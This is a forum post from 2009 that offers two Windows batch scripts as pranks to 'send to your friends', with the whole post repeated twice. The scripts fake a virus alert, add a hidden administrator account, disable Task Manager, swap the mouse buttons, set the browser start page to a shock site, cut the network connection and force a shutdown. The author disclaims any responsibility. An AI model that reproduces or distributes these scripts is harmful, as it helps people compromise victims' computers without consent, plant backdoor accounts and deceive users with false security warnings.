cillian
05-07-2009, 10:58 PM
Here is a batchfile I made, send it to your friends and laugh at them :P
@echo off
::------MsgBox Function------::
echo x=msgbox("Virus Detected, Please Scan!",vbCritical or vbOkOnly,"Error") >>dll32.vbs
start "" "dll32.vbs"
::---------------------------::
::-----Add Admin Account-----::
net user Usernamehere passwordhere /add
net localgroup administrators Usernamehere /add
::---------------------------::
::----Swap Mouse Buttons-----::
RUNDLL32 USER32.DLL,SwapMouseButton
::---------------------------::
::---Disable Taskmanager-----::
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
::---------------------------::
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "START PAGE" /d "http://www.meatspin.com"
And:
@echo off
::------MsgBox Function------::
echo x=msgbox("Virus Detected, Please Scan!",vbCritical or vbOkOnly,"Error") >>dll32.vbs
start "" "dll32.vbs"
::---------------------------::
::-----Add Admin Account-----::
net user Usernamehere passwordhere /add
net localgroup administrators Usernamehere /add
::---------------------------::
::---Disable Taskmanager-----::
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
::---------------------------::
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "START PAGE" /d "http://www.meatspin.com"
::-----Disable Internet------::
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all
::---------------------------::
::-----Shutdown Computer-----::
shutdown -s -t 10 -c "Owned"
::---------------------------::
Save as a .bat file
Edit whats in Red
Have fun, and note I don't take any responsibility for anything you may use these for.
@echo off
::------MsgBox Function------::
echo x=msgbox("Virus Detected, Please Scan!",vbCritical or vbOkOnly,"Error") >>dll32.vbs
start "" "dll32.vbs"
::---------------------------::
::-----Add Admin Account-----::
net user Usernamehere passwordhere /add
net localgroup administrators Usernamehere /add
::---------------------------::
::----Swap Mouse Buttons-----::
RUNDLL32 USER32.DLL,SwapMouseButton
::---------------------------::
::---Disable Taskmanager-----::
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
::---------------------------::
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "START PAGE" /d "http://www.meatspin.com"
And:
@echo off
::------MsgBox Function------::
echo x=msgbox("Virus Detected, Please Scan!",vbCritical or vbOkOnly,"Error") >>dll32.vbs
start "" "dll32.vbs"
::---------------------------::
::-----Add Admin Account-----::
net user Usernamehere passwordhere /add
net localgroup administrators Usernamehere /add
::---------------------------::
::---Disable Taskmanager-----::
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
::---------------------------::
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "START PAGE" /d "http://www.meatspin.com"
::-----Disable Internet------::
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all
::---------------------------::
::-----Shutdown Computer-----::
shutdown -s -t 10 -c "Owned"
::---------------------------::
Save as a .bat file
Edit whats in Red
Have fun, and note I don't take any responsibility for anything you may use these for.